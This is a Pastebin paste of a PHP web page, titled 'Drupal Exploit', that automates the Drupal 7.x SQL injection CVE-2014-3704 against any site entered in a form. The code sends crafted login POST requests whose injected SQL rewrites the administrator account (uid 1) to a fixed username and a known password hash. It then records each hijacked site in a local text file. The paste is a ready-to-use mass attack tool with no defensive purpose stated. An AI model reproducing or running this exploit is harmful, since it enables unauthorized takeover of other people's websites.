SHARE
TWEET

Drupal core 7.x Auto SQL Injection

jackwilder Jun 11th, 2015 4,733 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php ?>  <!Doctype HTML>
  2. <html>
  3. <head>
  4.         <title>Drupal Exploit</title>
  5. <body>
  6. </head>
  7. <body>
  8.         <div class="mymargin">
  9.                 <center>
  10.                         <font color="red"><h1>Drupal Exploit</h1></font>
  11.                          
  12.         <form method="GET" action="">
  13.                 Site : <input type="text" name="url" placeholder="Example: www.site.com">
  14.                 <input type="submit" name="submit" value="suck it !">
  15.         </form>
  16.         <br>
  17. <?php
  18. #-----------------------------------------------------------------------------#
  19. # Exploit Title: Drupal core 7.x - SQL Injection                              #
  20. # Date: Oct 16 2014                                                           #
  21. # Exploit Author: Dustin D&#1043;rr                                                 #
  22. # Software Link: http://www.drupal.com/                                       #
  23. # Version: Drupal core 7.x versions prior to 7.32                             #
  24. # CVE: CVE-2014-3704                                                          #
  25. #-----------------------------------------------------------------------------#
  26. $file = fopen("rock-you.txt", "a");
  27. error_reporting(0);
  28. if (isset($_GET['submit'])) {
  29.     $url = "http://" . $_GET['url'];
  30.     $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  31.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  32. ", 'content' => $post_data));
  33.     $ctx = stream_context_create($params);
  34.     $data = file_get_contents($url . '/user/login/', null, $ctx);
  35.     echo "<h4>Scanning at \"/user/login/</h4>\"";
  36.     if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  37.         $fp = fopen("rock-you.txt", 'a');
  38.         echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
  39.         echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
  40.         fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
  41.         fwrite($fp, "
  42. ");
  43.         fwrite($fp, "======================================Donnazmi==============================================================");
  44.         fwrite($fp, "
  45. ");
  46.         fclose($fp);
  47.     } else {
  48.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  49.     }
  50. }
  51. if (isset($_GET['submit'])) {
  52.     $url = "http://" . $_GET['url'] . "/";
  53.     $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  54.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  55. ", 'content' => $post_data));
  56.     $ctx = stream_context_create($params);
  57.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  58.     echo "<h4>Scanning at \"Index</h4>\"";
  59.     if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  60.         $fp = fopen("rock-you.txt", 'a');
  61.         echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
  62.         echo '<font color="red">Finished scanning. check =>  </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
  63.         fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
  64.         fwrite($fp, "
  65. ");
  66.         fwrite($fp, "======================================Donnazmi==============================================================");
  67.         fwrite($fp, "
  68. ");
  69.         fclose($fp);
  70.     } else {
  71.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  72.     }
  73. }
  74. ?>
  75. <br>
  76.         </div>
  77.  
  78. </body>
  79. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top